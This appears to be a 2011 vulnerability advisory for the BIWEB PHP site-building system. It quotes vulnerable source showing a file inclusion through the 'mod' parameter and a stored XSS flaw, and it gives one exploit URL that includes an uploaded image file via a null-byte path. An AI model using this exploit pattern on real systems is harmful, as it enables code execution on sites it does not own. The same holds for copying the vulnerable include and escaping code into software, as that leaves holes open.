BIWEB bug-fixed version: vulnerability warning — the black bar safety net

2011-12-20T00:00:00
ID MYHACK58:62201132650
Type myhack58
Reporter 佚名
Modified 2011-12-20T00:00:00

Description

BIWEB, a PHP open-source enterprise site-building system, bug-fixed version:

  1. Universal file inclusion

/wap/detail.php (and similar entry files)...

// Request-entry setup for /wap/detail.php: instantiates the wap module object and
// reads the two paging parameters. Both are coerced with intval(), so `page` and
// `cpage` cannot carry non-numeric payloads; the `mod` parameter handled further
// down in this file is the one that reaches include_once() without such coercion.
$objWebInit = new wap(); if (empty($_GET['page'])) {

// empty() also treats "0" as missing, so page=0 falls back to the first page
$intPage = 1 ;

} else {

$intPage = intval($_GET['page']);

}

if (empty($_GET['cpage'])) {

$intCPage = 1 ;

} else {

$intCPage = intval($_GET['cpage']);

}

if (! empty($_GET['mod'])) {

$strModuleID = strval($_GET['mod']);

include_once('../'.$strModuleID.'/config/var.inc.php');

$objWebInit->setDBG($arrGPdoDB);

$objWebInit->db();

Exploit example:

http://www.2cto.com /biwebcorp/wap/list. php? mod=uploadfile/2 0 1 1 1 2/2 0 1 1 1 2 1 8 0 2 5 6 1 5 6 4 8. jpg%0 0

2.

XSS in the PHP open-source enterprise site-building system (bug-fixed version)

message\include\index.inc.php

if ($_SERVER["REQUEST_METHOD"] == "POST"){

if(empty($_POST['contact'])) check::AlertExit('sorry, the name must be filled!', -1);

if(empty($_POST['tel'])) check::AlertExit('sorry, the contact number must be filled in!', -1);

.......

$strIP = check::getip();

$_POST['user_ip'] = $strIP;

$objWebInit->saveInfo($_POST,0); saveInfo function

// Persists one submitted record. The only sanitization visible in this excerpt is
// check::SqlInjection(), which applies addslashes() to each field — an SQL-oriented
// escape, not HTML output encoding. Whatever the caller passes in (the message form
// passes the raw $_POST array) is therefore stored as-is; if a later page renders
// those fields without htmlspecialchars(), that is the stored XSS this advisory reports.
// $arrData   user-supplied field array (the caller passes $_POST directly)
// $intModify defaults to 0; its meaning is not shown in this excerpt
function saveInfo($arrData,$intModify=0){

$arr = array();

// saveTableFieldG() presumably maps the input onto table columns — its body is not shown here
$arr = check::SqlInjection($this->saveTableFieldG($arrData));

.......

} SqlInjection function

// Escapes a scalar, or each value of a one-level array, with addslashes() unless
// magic_quotes_gpc already did so (or $enforce forces it). Notes for reviewers:
//  - addslashes() only backslash-escapes quotes, backslash and NUL; it is neither a
//    charset-aware SQL escape nor an HTML encoder, so it does nothing against XSS.
//  - Only one array level is walked: a nested array value is not recursed into and
//    reaches addslashes() as a non-string argument.
//  - get_magic_quotes_gpc() was deprecated in PHP 7.4 and removed in PHP 8.0, so
//    this helper fails on current PHP; prepared statements with bound parameters
//    (PDO) are the replacement for this whole escaping approach.
// $ParamValue  string or array of strings to escape
// $enforce     when true, escape even if magic_quotes_gpc is enabled
// returns the escaped value in the same shape it was given
static function SqlInjection($ParamValue,$enforce=false){

if (! get_magic_quotes_gpc() || $enforce){

if (is_array($ParamValue)){

foreach ($ParamValue as $key=>$value){

$ParamValue[$key] = addslashes($value);

}

}else{

$ParamValue = addslashes($ParamValue);

}

}

return $ParamValue;

} Portal PHP open-source build systemxss a big lump..